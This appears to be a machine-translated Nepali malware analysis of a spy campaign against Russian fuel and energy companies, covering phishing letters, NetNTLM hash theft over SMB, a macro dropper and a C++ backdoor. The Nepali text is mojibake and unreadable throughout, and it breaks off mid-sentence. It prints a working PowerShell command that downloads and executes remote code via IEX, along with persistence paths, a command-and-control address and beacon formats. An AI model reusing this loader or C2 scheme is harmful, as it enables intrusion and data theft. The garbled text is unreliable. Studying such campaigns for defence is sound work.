рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рдХрдореНрдкреНрдпреВрдЯрд░ рд╕реБрд░рдХреНрд╖рд╛ рдШрдЯрдирд╛рд╣рд░реВрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рдирдорд╛ рд╣рд╛рдореНрд░реЛ рдЕрдиреБрднрд╡рд▓реЗ рджреЗрдЦрд╛рдЙрдБрдЫ рдХрд┐ рдЗрдореЗрд▓ рдЕрдЭреИ рдкрдирд┐ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдиреЗ рд╕рдмреИрднрдиреНрджрд╛ рд╕рд╛рдорд╛рдиреНрдп рдЪреНрдпрд╛рдирд▓рд╣рд░реВ рдордзреНрдпреЗ рдПрдХ рд╣реЛ рдЬреБрди рд╕реБрд░реБрдорд╛ рдЖрдХреНрд░рдордг рдЧрд░рд┐рдПрдХрд╛ рдиреЗрдЯрд╡рд░реНрдХ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рд╣рд░реВ рдШреБрд╕рд╛рдЙрди рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫред рд╕рдВрджрд┐рдЧреНрдз (рд╡рд╛ рддреНрдпрддрд┐ рд╢рдВрдХрд╛рд╕реНрдкрдж) рдкрддреНрд░рдХреЛ рд╕рд╛рде рдПрдХ рд▓рд╛рдкрд░рд╡рд╛рд╣ рдХрд╛рд░реНрдп рдердк рд╕рдВрдХреНрд░рдордгрдХреЛ рд▓рд╛рдЧрд┐ рдкреНрд░рд╡реЗрд╢ рдмрд┐рдиреНрджреБ рдмрдиреНрдЫ, рддреНрдпрд╕реИрд▓реЗ рд╕рд╛рдЗрдмрд░ рдЕрдкрд░рд╛рдзреАрд╣рд░реВрд▓реЗ рд╕рдХреНрд░рд┐рдп рд░реВрдкрдорд╛ рд╕рд╛рдорд╛рдЬрд┐рдХ рдЗрдиреНрдЬрд┐рдирд┐рдпрд░рд┐рдЩ рд╡рд┐рдзрд┐рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рд░рд╣реЗрдХрд╛ рдЫрдиреН, рдпрджреНрдпрдкрд┐ рд╕рдлрд▓рддрд╛рдХреЛ рд╡рд┐рднрд┐рдиреНрди рдбрд┐рдЧреНрд░реАрд╣рд░реВ рдЫрдиреНред

рдпрд╕ рдкреЛрд╖реНрдЯрдорд╛ рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рдзреЗрд░реИ рдЙрджреНрдпрдорд╣рд░реВрд▓рд╛рдИ рд▓рдХреНрд╖рд┐рдд рд╕реНрдкреНрдпрд╛рдо рдЕрднрд┐рдпрд╛рдирдорд╛ рд╣рд╛рдореНрд░реЛ рднрд░реНрдЦрд░рдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рдирдХреЛ рдмрд╛рд░реЗрдорд╛ рдХреБрд░рд╛ рдЧрд░реНрди рдЪрд╛рд╣рдиреНрдЫреМрдВред рд╕рдмреИ рдЖрдХреНрд░рдордгрд╣рд░реВрд▓реЗ рдирдХреНрдХрд▓реА рдЗрдореЗрд▓рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдПрдЙрдЯреИ рдкрд░рд┐рджреГрд╢реНрдпрд▓рд╛рдИ рдкрдЫреНрдпрд╛рдП, рд░ рдХрд╕реИрд▓реЗ рдкрдирд┐ рдпреА рдЗрдореЗрд▓рд╣рд░реВрдХреЛ рдкрд╛рда рд╕рд╛рдордЧреНрд░реАрдорд╛ рдзреЗрд░реИ рдкреНрд░рдпрд╛рд╕ рдЧрд░реЗрдХреЛ рджреЗрдЦрд┐рдПрдиред

рдЦреБрдлрд┐рдпрд╛ рд╕реЗрд╡рд╛

рдпреЛ рд╕рдмреИ рдЕрдкреНрд░рд┐рд▓ реирежреиреж рдХреЛ рдЕрдиреНрддреНрдпрдорд╛ рд╕реБрд░реБ рднрдпреЛ, рдЬрдм рдбрд╛рдХреНрдЯрд░ рд╡реЗрдм рднрд╛рдЗрд░рд╕ рд╡рд┐рд╢реНрд▓реЗрд╖рдХрд╣рд░реВрд▓реЗ рд╕реНрдкреНрдпрд╛рдо рдЕрднрд┐рдпрд╛рди рдкрддреНрддрд╛ рд▓рдЧрд╛рдП рдЬрд╕рдорд╛ рд╣реНрдпрд╛рдХрд░рд╣рд░реВрд▓реЗ рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдЙрд░реНрдЬрд╛ рдХрдореНрдкреНрд▓реЗрдХреНрд╕рдХрд╛ рдзреЗрд░реИ рдЙрджреНрдпрдорд╣рд░реВрдХрд╛ рдХрд░реНрдордЪрд╛рд░реАрд╣рд░реВрд▓рд╛рдИ рдЕрдкрдбреЗрдЯ рдЧрд░рд┐рдПрдХреЛ рдЯреЗрд▓рд┐рдлреЛрди рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкрдард╛рдПред рдирд┐рд╕реНрд╕рдиреНрджреЗрд╣, рдпреЛ рдЪрд┐рдиреНрддрд╛рдХреЛ рд╕рд╛рдзрд╛рд░рдг рд╢реЛ рдерд┐рдПрди, рдХрд┐рдирдХрд┐ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдерд┐рдПрди, рд░ .docx рдХрд╛рдЧрдЬрд╛рддрд╣рд░реВрд▓реЗ рдЯрд╛рдврд╛рдХрд╛ рд╕реНрд░реЛрддрд╣рд░реВрдмрд╛рдЯ рджреБрдИ рдЫрд╡рд┐рд╣рд░реВ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрдпреЛред

рддреА рдордзреНрдпреЗ рдПрдЙрдЯрд╛ рд╕рдорд╛рдЪрд╛рд░[.]zannews[.]com рд╕рд░реНрднрд░рдмрд╛рдЯ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рдХрдореНрдкреНрдпреБрдЯрд░рдорд╛ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛред рдпреЛ рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рдЫ рдХрд┐ рдбреЛрдореЗрди рдирд╛рдо рдХрдЬрд╛рдХрд┐рд╕реНрддрд╛рди - zannews [.]kz рдХреЛ рднреНрд░рд╖реНрдЯрд╛рдЪрд╛рд░ рд╡рд┐рд░реЛрдзреА рдорд┐рдбрд┐рдпрд╛ рдХреЗрдиреНрджреНрд░ рдХреЛ рдбреЛрдореЗрди рдЬрд╕реНрддреИ рдЫред рдЕрд░реНрдХреЛрддрд░реНрдл, рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдПрдХреЛ рдбреЛрдореЗрдирд▓реЗ рддреБрд░реБрдиреНрддреИ TOPNEWS рднрдиреЗрд░ рдЪрд┐рдирд┐рдиреЗ рдЕрд░реНрдХреЛ 2015 рдЕрднрд┐рдпрд╛рдирдХреЛ рд╕рдореНрдЭрдирд╛ рдЧрд░рд╛рдПрдХреЛ рдерд┐рдпреЛ, рдЬрд╕рд▓реЗ ICEFOG рдмреНрдпрд╛рдХрдбреЛрд░ рдкреНрд░рдпреЛрдЧ рдЧрд░реНтАНрдпреЛ рд░ рддрд┐рдиреАрд╣рд░реВрдХреЛ рдирд╛рдордорд╛ рд╕рдмрд╕реНрдЯреНрд░рд┐рдЩ "рд╕рдорд╛рдЪрд╛рд░" рд╕рд╣рд┐рдд рдЯреНрд░реЛрдЬрди рдирд┐рдпрдиреНрддреНрд░рдг рдбреЛрдореЗрдирд╣рд░реВ рдерд┐рдПред рдЕрд░реНрдХреЛ рдЪрд╛рдЦрд▓рд╛рдЧреНрджреЛ рд╡рд┐рд╢реЗрд╖рддрд╛ рдпреЛ рдерд┐рдпреЛ рдХрд┐ рд╡рд┐рднрд┐рдиреНрди рдкреНрд░рд╛рдкреНрддрдХрд░реНрддрд╛рд╣рд░реВрд▓рд╛рдИ рдЗрдореЗрд▓рд╣рд░реВ рдкрдард╛рдЙрдБрджрд╛, рдЫрд╡рд┐ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрди рдЕрдиреБрд░реЛрдзрд╣рд░реВрдорд╛ рдлрд░рдХ рдЕрдиреБрд░реЛрдз рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВ рд╡рд╛ рдЕрджреНрд╡рд┐рддреАрдп рдЫрд╡рд┐ рдирд╛рдорд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдпреЛред

рд╣рд╛рдореА рд╡рд┐рд╢реНрд╡рд╛рд╕ рдЧрд░реНрдЫреМрдВ рдХрд┐ рдпреЛ "рд╡рд┐рд╢реНрд╡рд╕рдиреАрдп" рдареЗрдЧрд╛рдирд╛рдХреЛ рдкрд╣рд┐рдЪрд╛рди рдЧрд░реНрди рдЬрд╛рдирдХрд╛рд░реА рд╕рдЩреНрдХрд▓рди рдЧрд░реНрдиреЗ рдЙрджреНрджреЗрд╢реНрдпрд▓реЗ рдЧрд░рд┐рдПрдХреЛ рд╣реЛ, рдЬрд╕рд▓реЗ рд╕рд╣реА рд╕рдордпрдорд╛ рдкрддреНрд░ рдЦреЛрд▓реНрдиреЗ рдЧреНрдпрд╛рд░реЗрдиреНрдЯреА рдЧрд░реНрдиреЗрдЫред SMB рдкреНрд░реЛрдЯреЛрдХрд▓ рджреЛрд╕реНрд░реЛ рд╕рд░реНрднрд░рдмрд╛рдЯ рдЫрд╡рд┐ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрди рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛ, рдЬреБрди рдкреНрд░рд╛рдкреНрдд рдХрд╛рдЧрдЬрд╛рдд рдЦреЛрд▓реНрдиреЗ рдХрд░реНрдордЪрд╛рд░реАрд╣рд░реВрдХреЛ рдХрдореНрдкреНрдпреБрдЯрд░рдмрд╛рдЯ NetNTLM рд╣реНрдпрд╛рд╕рд╣рд░реВ рд╕рдЩреНрдХрд▓рди рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫред

рд░ рдпрд╣рд╛рдБ рдирдХреНрдХрд▓реА рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдХреЛ рд╕рд╛рде рдкрддреНрд░ рдиреИ рдЫ:

рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рдпрд╕ рд╡рд░реНрд╖рдХреЛ рдЬреБрдирдорд╛, рд╣реНрдпрд╛рдХрд░рд╣рд░реВрд▓реЗ рдЫрд╡рд┐рд╣рд░реВ рдЕрдкрд▓реЛрдб рдЧрд░реНрди рд╕реНрдкреЛрд░реНрдЯреНрд╕[.]manhajnews[.]com, рдирдпрд╛рдБ рдбреЛрдореЗрди рдирд╛рдо рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рдерд╛рд▓реЗред рд╡рд┐рд╢реНрд▓реЗрд╖рдгрд▓реЗ рджреЗрдЦрд╛рдпреЛ рдХрд┐ рдХрдореНрддрд┐рдорд╛ рд╕реЗрдкреНрдЯреЗрдореНрдмрд░ 2019 рджреЗрдЦрд┐ manhajnews[.]com рдХреЛ рд╕рдмрдбреЛрдореЗрдирд╣рд░реВ рд╕реНрдкреНрдпрд╛рдо рдореЗрд▓рд┐рдЩрд╣рд░реВрдорд╛ рдкреНрд░рдпреЛрдЧ рднрдЗрд░рд╣реЗрдХреЛ рдЫред рдпрд╕ рдЕрднрд┐рдпрд╛рдирдХреЛ рд▓рдХреНрд╖реНрдп рдордзреНрдпреЗ рдПрдХ рдареВрд▓реЛ рд░реВрд╕реА рд╡рд┐рд╢реНрд╡рд╡рд┐рджреНрдпрд╛рд▓рдп рдерд┐рдпреЛред

рд╕рд╛рдереИ, рдЬреБрдирдорд╛, рдЖрдХреНрд░рдордгрдХрд╛ рдЖрдпреЛрдЬрдХрд╣рд░реВрд▓реЗ рдЖрдлреНрдиреЛ рдкрддреНрд░рд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рдирдпрд╛рдБ рдкрд╛рда рд▓рд┐рдПрд░ рдЖрдП: рдпрд╕ рдкрдЯрдХ рдХрд╛рдЧрдЬрд╛рддрдорд╛ рдЙрджреНрдпреЛрдЧ рд╡рд┐рдХрд╛рд╕рдХреЛ рдмрд╛рд░реЗрдорд╛ рдЬрд╛рдирдХрд╛рд░реА рд╕рдорд╛рд╡реЗрд╢ рдерд┐рдпреЛред рдкрддреНрд░рдХреЛ рдкрд╛рдард▓реЗ рд╕реНрдкрд╖реНрдЯ рд░реВрдкрдорд╛ рд╕рдВрдХреЗрдд рдЧрд░реНтАНрдпреЛ рдХрд┐ рдпрд╕рдХреЛ рд▓реЗрдЦрдХ рдпрд╛ рдд рд░реВрд╕реА рднрд╛рд╖рд╛рдХреЛ рдореВрд▓ рд╡рдХреНрддрд╛ рдерд┐рдПрдирдиреН, рд╡рд╛ рдЬрд╛рдирд╛рдЬрд╛рдиреА рдЖрдлреНрдиреЛ рдмрд╛рд░реЗрдорд╛ рдпрд╕реНрддреЛ рдЫрд╛рдк рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ рдерд┐рдПред рджреБрд░реНрднрд╛рдЧреНрдпрд╡рд╢, рдЙрджреНрдпреЛрдЧрдХреЛ рд╡рд┐рдХрд╛рд╕рдХрд╛ рд╡рд┐рдЪрд╛рд░рд╣рд░реВ, рд╕рдзреИрдВ рдЬрд╕реНрддреИ, рдХреЗрд╡рд▓ рдПрдХ рдЖрд╡рд░рдг рдмрдиреНрдпреЛ - рдХрд╛рдЧрдЬрд╛рддрд▓реЗ рдлреЗрд░рд┐ рджреБрдИ рдЫрд╡рд┐рд╣рд░реВ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрдпреЛ, рдЬрдмрдХрд┐ рд╕рд░реНрднрд░ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрди рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░рд┐рдпреЛ [.]inklingpaper[.]comред

рдЕрд░реНрдХреЛ рдирд╡реАрдирддрд╛ рдЬреБрд▓рд╛рдИрдорд╛ рдкрдЫреНрдпрд╛рдЗрдПрдХреЛ рдерд┐рдпреЛред рдПрдиреНрдЯрд┐рднрд╛рдЗрд░рд╕ рдкреНрд░реЛрдЧреНрд░рд╛рдорд╣рд░реВрджреНрд╡рд╛рд░рд╛ рдорд╛рд▓рд┐рд╕рд┐рдпрд╕ рдХрд╛рдЧрдЬрд╛рддрд╣рд░реВрдХреЛ рдкрд╣рд┐рдЪрд╛рдирд▓рд╛рдИ рдмрд╛рдЗрдкрд╛рд╕ рдЧрд░реНрдиреЗ рдкреНрд░рдпрд╛рд╕рдорд╛, рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рдкрд╛рд╕рд╡рд░реНрдбрдХреЛ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдорд╛рдЗрдХреНрд░реЛрд╕рдлреНрдЯ рд╡рд░реНрдб рдХрд╛рдЧрдЬрд╛рддрд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рдерд╛рд▓реЗред рдПрдХреИ рд╕рдордпрдорд╛, рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рдХреНрд▓рд╛рд╕рд┐рдХ рд╕рд╛рдорд╛рдЬрд┐рдХ рдИрдиреНрдЬрд┐рдирд┐рдпрд░рд┐рдЩреН рдкреНрд░рд╡рд┐рдзрд┐ - рдкреБрд░рд╕реНрдХрд╛рд░ рд╕реВрдЪрдирд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдиреЗ рдирд┐рд░реНрдгрдп рдЧрд░реЗред

рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рдкреБрдирд░рд╛рд╡реЗрджрдирдХреЛ рдкрд╛рда рдкрдирд┐ рдЙрд╣реА рд╢реИрд▓реАрдорд╛ рд▓реЗрдЦрд┐рдПрдХреЛ рдерд┐рдпреЛ, рдЬрд╕рд▓реЗ рд╕рдореНрдмреЛрдзрдирдХрд░реНрддрд╛рдорд╛ рдердк рд╢рдВрдХрд╛ рдЙрддреНрдкрдиреНрди рдЧрд░реНрдпреЛред рдЫрд╡рд┐ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрди рд╕рд░реНрднрд░ рдкрдирд┐ рдкрд░рд┐рд╡рд░реНрддрди рднрдПрдиред

рдиреЛрдЯ рдЧрд░реНрдиреБрд╣реЛрд╕реН рдХрд┐ рд╕рдмреИ рдЕрд╡рд╕реНрдерд╛рдорд╛, рдкрддреНрд░ рдкрдард╛рдЙрдирдХреЛ рд▓рд╛рдЧрд┐ рдореЗрд▓рдорд╛ рджрд░реНрддрд╛ рднрдПрдХрд╛ рдЗрд▓реЗрдХреНрдЯреНрд░реЛрдирд┐рдХ рдореЗрд▓рдмрдХреНрд╕рд╣рд░реВ [.]ru рд░ yandex[.]ru рдбреЛрдореЗрдирд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдереНрдпреЛред

рдЖрдХреНрд░рдордг

рд╕реЗрдкреНрдЯреЗрдореНрдмрд░ реирежреиреж рдХреЛ рд╢реБрд░реБрдорд╛, рдпреЛ рдХрд╛рд░реНрдпрдХреЛ рд▓рд╛рдЧрд┐ рд╕рдордп рдерд┐рдпреЛред рд╣рд╛рдореНрд░рд╛ рднрд╛рдЗрд░рд╕ рд╡рд┐рд╢реНрд▓реЗрд╖рдХрд╣рд░реВрд▓реЗ рдЖрдХреНрд░рдордгрдХреЛ рдирдпрд╛рдБ рд▓рд╣рд░ рд░реЗрдХрд░реНрдб рдЧрд░реЗ, рдЬрд╕рдорд╛ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рдлреЗрд░рд┐ рдЯреЗрд▓рд┐рдлреЛрди рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рдЕрдкрдбреЗрдЯ рдЧрд░реНрдиреЗ рдмрд╣рд╛рдирд╛рдорд╛ рдкрддреНрд░рд╣рд░реВ рдкрдард╛рдПред рдЬреЗ рд╣реЛрд╕реН, рдпрд╕ рдкрдЯрдХ рд╕рдВрд▓рдЧреНрдирдХрдорд╛ рдЦрд░рд╛рдм рдореНрдпрд╛рдХреНрд░реЛ рд╕рдорд╛рд╡реЗрд╢ рдЫред

рд╕рдВрд▓рдЧреНрди рдХрд╛рдЧрдЬрд╛рдд рдЦреЛрд▓реНрджрд╛, рдореНрдпрд╛рдХреНрд░реЛрд▓реЗ рджреБрдИ рдлрд╛рдЗрд▓рд╣рд░реВ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрдпреЛ:

  • VBS рд╕реНрдХреНрд░рд┐рдкреНрдЯ %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, рдЬреБрди рдмреНрдпрд╛рдЪ рдлрд╛рдЗрд▓ рд╕реБрд░реБ рдЧрд░реНрдиреЗ рдЙрджреНрджреЗрд╢реНрдп рдерд┐рдпреЛ;
  • рдмреНрдпрд╛рдЪ рдлрд╛рдЗрд▓ рдЖрдлреИ %APPDATA%configstest.bat, рдЬреБрди рдЕрд╕реНрдкрд╖реНрдЯ рдерд┐рдпреЛред

рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рдпрд╕рдХреЛ рдХрд╛рдордХреЛ рд╕рд╛рд░ рдХреЗрд╣рд┐ рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВрд╕рдБрдЧ Powershell рд╢реЗрд▓ рд╕реБрд░реБ рдЧрд░реНрди рддрд▓ рдЖрдЙрдБрдЫред рд╢реЗрд▓рдорд╛ рдкрд╛рд╕ рдЧрд░рд┐рдПрдХрд╛ рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВ рдЖрджреЗрд╢рд╣рд░реВрдорд╛ рдбрд┐рдХреЛрдб рдЧрд░рд┐рдПрдХрд╛ рдЫрдиреН:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

рдкреНрд░рд╕реНрддреБрдд рдЖрджреЗрд╢рд╣рд░реВрдмрд╛рдЯ рдирд┐рдореНрдирд╛рдиреБрд╕рд╛рд░, рдкреЗрд▓реЛрдб рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░рд┐рдПрдХреЛ рдбреЛрдореЗрдирд▓рд╛рдИ рдлреЗрд░рд┐ рд╕рдорд╛рдЪрд╛рд░ рд╕рд╛рдЗрдЯрдХреЛ рд░реВрдкрдорд╛ рд▓реБрдХрд╛рдЗрдПрдХреЛ рдЫред рдПрдХ рд╕рд╛рдзрд╛рд░рдг рд▓реЛрдбрд░, рдЬрд╕рдХреЛ рдПрдХрдорд╛рддреНрд░ рдХрд╛рд░реНрдп рдЖрджреЗрд╢ рд░ рдирд┐рдпрдиреНрддреНрд░рдг рд╕рд░реНрднрд░рдмрд╛рдЯ рд╢реЗрд▓рдХреЛрдб рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рд░ рдпрд╕рд▓рд╛рдИ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрдиреБ рд╣реЛред рд╣рд╛рдореАрд▓реЗ рджреБрдИ рдкреНрд░рдХрд╛рд░рдХрд╛ рдмреНрдпрд╛рдХрдбреЛрд░рд╣рд░реВ рдкрд╣рд┐рдЪрд╛рди рдЧрд░реНрди рд╕рдХреНрд╖рдо рдерд┐рдпреМрдВ рдЬреБрди рдкреАрдбрд┐рддрдХреЛ рдкреАрд╕реАрдорд╛ рд╕реНрдерд╛рдкрдирд╛ рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫред

BackDoor.Siggen2.3238

рдкрд╣рд┐рд▓реЛ рд╣реЛ BackDoor.Siggen2.3238 тАФ рд╣рд╛рдореНрд░рд╛ рд╡рд┐рд╢реЗрд╖рдЬреНрдЮрд╣рд░реВрд▓реЗ рдкрд╣рд┐рд▓реЗ рд╕рд╛рдордирд╛ рдЧрд░реЗрдХрд╛ рдерд┐рдПрдирдиреН, рд░ рдЕрдиреНрдп рдПрдиреНрдЯрд┐рднрд╛рдЗрд░рд╕ рд╡рд┐рдХреНрд░реЗрддрд╛рд╣рд░реВрджреНрд╡рд╛рд░рд╛ рдпрд╕ рдХрд╛рд░реНрдпрдХреНрд░рдордХреЛ рдХреБрдиреИ рдЙрд▓реНрд▓реЗрдЦ рдкрдирд┐ рдерд┐рдПрдиред

рдпреЛ рдХрд╛рд░реНрдпрдХреНрд░рдо C++ рдорд╛ рд▓реЗрдЦрд┐рдПрдХреЛ рдмреНрдпрд╛рдХрдбреЛрд░ рд╣реЛ рд░ рейреи-рдмрд┐рдЯ рд╡рд┐рдиреНрдбреЛрдЬ рдЕрдкрд░реЗрдЯрд┐рдЩ рд╕рд┐рд╕реНрдЯрдорд╣рд░реВрдорд╛ рдЪрд▓рд┐рд░рд╣реЗрдХреЛ рдЫред

BackDoor.Siggen2.3238 рджреБрдИ рдкреНрд░реЛрдЯреЛрдХрд▓рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрди рд╕рд░реНрднрд░рд╕рдБрдЧ рд╕рдЮреНрдЪрд╛рд░ рдЧрд░реНрди рд╕рдХреНрд╖рдо рдЫ: HTTP рд░ HTTPSред рдкрд░реАрдХреНрд╖рдг рдЧрд░рд┐рдПрдХреЛ рдирдореВрдирд╛рд▓реЗ HTTPS рдкреНрд░реЛрдЯреЛрдХрд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред рдирд┐рдореНрди рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдиреНрдЯ рд╕рд░реНрднрд░рдорд╛ рдЕрдиреБрд░реЛрдзрд╣рд░реВрдорд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫ:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

рдпрд╕ рдЕрд╡рд╕реНрдерд╛рдорд╛, рд╕рдмреИ рдЕрдиреБрд░реЛрдзрд╣рд░реВ рдирд┐рдореНрди рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВрдХреЛ рд╕реЗрдЯрдХреЛ рд╕рд╛рде рдЖрдкреВрд░реНрддрд┐ рдЧрд░рд┐рдиреНрдЫ:

%s;type=%s;length=%s;realdata=%send

рдЬрд╣рд╛рдБ рдкреНрд░рддреНрдпреЗрдХ рд░реЗрдЦрд╛ %s рд▓рд╛рдИ рд╕рдорд╛рди рд░реВрдкрдорд╛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрди рдЧрд░рд┐рдПрдХреЛ рдЫ:

  • рд╕рдВрдХреНрд░рдорд┐рдд рдХрдореНрдкреНрдпреБрдЯрд░рдХреЛ рдЖрдИрдбреА,
  • рдкрдард╛рдЗрдПрдХреЛ рдЕрдиреБрд░реЛрдз рдХреЛ рдкреНрд░рдХрд╛рд░,
  • рд░рд┐рдпрд▓рдбреЗрдЯрд╛ рдлрд┐рд▓реНрдбрдорд╛ рдбрд╛рдЯрд╛рдХреЛ рд▓рдореНрдмрд╛рдЗ,
  • рдбрд╛рдЯрд╛

рд╕рдВрдХреНрд░рдорд┐рдд рдкреНрд░рдгрд╛рд▓реАрдХреЛ рдмрд╛рд░реЗрдорд╛ рдЬрд╛рдирдХрд╛рд░реА рд╕рдЩреНрдХрд▓рди рдЧрд░реНрдиреЗ рдЪрд░рдгрдорд╛, рдкрдЫрд╛рдбрд┐рдХреЛ рдвреЛрдХрд╛рд▓реЗ рдЬрд╕реНрддреИ рд░реЗрдЦрд╛ рдЙрддреНрдкрдиреНрди рдЧрд░реНрджрдЫ:

lan=%s;cmpname=%s;username=%s;version=%s;

рдЬрд╣рд╛рдБ lan рд╕рдВрдХреНрд░рдорд┐рдд рдХрдореНрдкреНрдпреБрдЯрд░рдХреЛ IP рдареЗрдЧрд╛рдирд╛ рд╣реЛ, cmpname рдХрдореНрдкреНрдпреБрдЯрд░рдХреЛ рдирд╛рдо рд╣реЛ, рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рд╣реЛ, рд╕рдВрд╕реНрдХрд░рдг 0.0.4.03 рд▓рд╛рдЗрди рд╣реЛред

sysinfo рдкрд╣рд┐рдЪрд╛рдирдХрд░реНрддрд╛рд╕рдБрдЧрдХреЛ рдпреЛ рдЬрд╛рдирдХрд╛рд░реА https[:]//31.214[.]157.14/log.txt рдорд╛ рдЕрд╡рд╕реНрдерд┐рдд рдирд┐рдпрдиреНрддреНрд░рдг рд╕рд░реНрднрд░рдорд╛ POST рдЕрдиреБрд░реЛрдз рдорд╛рд░реНрдлрдд рдкрдард╛рдЗрдиреНрдЫред рдпрджрд┐ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдорд╛ BackDoor.Siggen2.3238 рд╣рд╛рд░реНрдЯ рд╕рд┐рдЧреНрдирд▓ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрджрдЫ, рдЬрдбрд╛рди рд╕рдлрд▓ рдорд╛рдирд┐рдиреНрдЫ, рд░ рдмреНрдпрд╛рдХрдбреЛрд░рд▓реЗ рд╕рд░реНрднрд░рд╕рдБрдЧ рд╕рдЮреНрдЪрд╛рд░рдХреЛ рдореБрдЦреНрдп рдЪрдХреНрд░ 